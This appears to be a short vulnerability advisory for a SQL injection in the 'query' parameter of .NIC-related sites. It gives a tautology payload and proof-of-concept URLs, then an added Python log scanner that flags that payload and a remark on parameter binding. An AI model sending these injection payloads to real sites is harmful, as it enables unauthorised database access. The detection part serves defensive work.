# Exploit Title: .NIC SQL Vulnerability
# Google Dork: N/A
# Date: 02/01/2018
# Exploit Author: Ozan Agdepe
# Vendor Homepage: http://nic.ms & http://nic.ac
# Tested on: KaliLinux_X64/Win 7-8-10_x64

########################

# Exploit Author: Ozan Agdepe
# Email: agdepeozan@gmail.com
# Author web: Agdepe.net
# Author twitter: @OAdepe
# Author GitHub: https://github.com/0z4nAgd3p3

# ###################

# SQL Injection Type: Bypass SQL Injection
# Parameter: query
# Page: /news-item-1?query= & /robots.txt?query= & /hello-world/images/images?query= etc.
# Attack: query' OR '1'='1' --
# Description:
# The vulnerability allows an attacker to inject SQL commands.

# Proof of Concept:

#1)
http://localhost/robots.txt?query=query%27+AND+%271%27%3D%271%27+--+
http://localhost/news-item-1?query=query%27+AND+%271%27%3D%271%27+--+
http://localhost/faqs?query=query%27+AND+%271%27%3D%271%27+--+

#####
# query%27+AND+%271%27%3D%271%27+--+
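
# Detection (added example, not part of the original advisory or the vendor's code):
# The Python below scans web access-log lines for the PoC's payload shape in the `query` parameter. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A closing quote, then AND/OR with a quoted literal compared to itself
# (the '1'='1' shape from the advisory), then a trailing SQL line comment.
TAUTOLOGY = re.compile(
    r"'\s*(?:AND|OR)\s*'([^']*)'\s*=\s*'\1'\s*--", re.IGNORECASE)

# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_query_values(log_line, param="query"):
    """Return decoded values of `param` that match the tautology pattern."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    # parse_qs percent-decodes and turns '+' into a space, as in the PoC URLs.
    query_string = urlsplit(m.group(1)).query
    values = parse_qs(query_string, keep_blank_values=True).get(param, [])
    return [v for v in values if TAUTOLOGY.search(v)]

def scan(lines, param="query"):
    """Map each flagged (client, path) pair to the decoded payloads seen."""
    hits = {}
    for line in lines:
        found = suspicious_query_values(line, param)
        if found:
            client = line.split(" ", 1)[0]
            path = urlsplit(REQUEST.search(line).group(1)).path
            hits.setdefault((client, path), []).extend(found)
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jan/2018:10:00:01 +0000] "GET /robots.txt?query=query%27+AND+%271%27%3D%271%27+--+ HTTP/1.1" 200 512',
    '192.0.2.10 - - [02/Jan/2018:10:00:02 +0000] "GET /faqs?query=query%27+OR+%271%27%3D%271%27+--+ HTTP/1.1" 200 2048',
    '198.51.100.7 - - [02/Jan/2018:10:00:05 +0000] "GET /faqs?query=rock+%27n%27+roll HTTP/1.1" 200 2048',
    '198.51.100.7 - - [02/Jan/2018:10:00:09 +0000] "GET /news-item-1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for (client, path), payloads in scan(SAMPLE_LOG).items():
        print(client, path, payloads)
```

Pattern matching of this kind only surfaces this payload shape in logs; the fix on the application side is to bind `query` as a parameter instead of concatenating it into SQL.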